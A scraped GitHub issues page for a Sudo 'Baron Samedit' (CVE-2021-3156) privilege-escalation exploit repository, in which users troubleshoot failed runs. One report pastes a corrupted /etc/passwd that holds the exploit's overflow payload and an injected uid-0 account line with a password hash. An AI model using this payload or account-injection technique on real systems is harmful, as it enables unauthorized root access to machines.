worawit / cve-2021-3156 Goto Github PK
View Code? Open in Web Editor NEWSudo Baron Samedit Exploit
License: BSD 3-Clause "New" or "Revised" License
Sudo Baron Samedit Exploit
License: BSD 3-Clause "New" or "Revised" License
Hi @worawit
does this mean that this configuration is not usable or needs some work?
End output:
offset to defaults: 0x60
sudoedit: option `mail_always' does not take a value
sudoedit: you are not permitted to use the -C option
invalid offset. exit code: 256
$ sudo -V
Sudo version 1.8.6p3
Sudoers policy plugin version 1.8.6p3
Sudoers file grammar version 42
Sudoers I/O plugin version 1.8.6p3
$ uname -r
4.9.75-25.55.amzn1.x86_64
$ ldd --version
ldd (GNU libc) 2.17
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
Hi worawit,
sudo --version
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2
uname -a
Linux ubuntu 4.15.0-48-generic #51-Ubuntu SMP Wed Apr 3 08:28:49 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
Exploit Used : exploit_timestamp_race.c
After running the exploit a modification was made on /etc/passwd file adding the (gg) user but i can't use (sudo gg) or (su gg)
user@ubuntu:~$ su gg
su: Cannot determine your user name.
user@ubuntu:~$ sudo gg
sudo: unknown uid 1000: who are you?
This is the content of /etc/passwd after runing the exploit :
user@ubuntu:~$ cat /etc/passwd
root▒▒▒▒g▒BP1▒ErUiq/▒L/▒ ▒0)▒L/0▒▒Er1▒ErU▒ ▒0▒▒▒0▒b▒ErU}1000▒0▒▒▒▒g▒▒Hq/▒M/▒▒▒▒▒@▒O/PΑErU▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒g▒g$▒0R▒▒0`▒O/▒i▒CrU▒▒▒▒g▒▒ErUx
▒▒ ▒▒ ▒▒▒pM/@▒▒ErU ▒▒ ▒▒ ▒▒ ▒▒▒▒▒▒g▒@▒▒ErUx
▒▒PΑErUw֢CrUx
▒▒▒▒CrU▒``
▒▒Y|/1pa▒1▒▒0▒▒0▒▒▒▒g▒`▒▒ErU▒▒▒0`
▒▒Y|/1pa▒1▒▒0▒▒▒ErU`▒▒ErU▒▒▒▒g▒@▒s1▒4▒CrU▒▒CrU`
▒▒▒+▒0eh
▒▒▒▒ѢCrU▒▒▒▒▒▒CrU`
▒▒▒▒▒Z▒C▒▒▒▒▒▒BӸs1▒q1▒
E0▒▒CrU`
▒▒▒▒CrUX
▒▒▒▒▒▒▒lI▒CrU▒▒▒▒▒▒▒▒▒▒(▒▒▒▒▒▒▒▒▒▒▒!`▒▒▒▒d@▒▒CrU8 ▒r1 ▒▒CrU
▒
▒▒▒▒▒▒▒g▒JD▒▒/▒q▒x86_64sudoedit-A-sAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\1234567AAAAAAAAAAAAAAAAAAAAAAAA1234567\././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././e
gg:$5$a$gemgwVPxLx/tdtByhncd4joKlMRYQ3IVwdoBXPACCL2:0:0:gg:/root:/bin/bash
LC_MESSAGES=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALANG=CTZ=:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA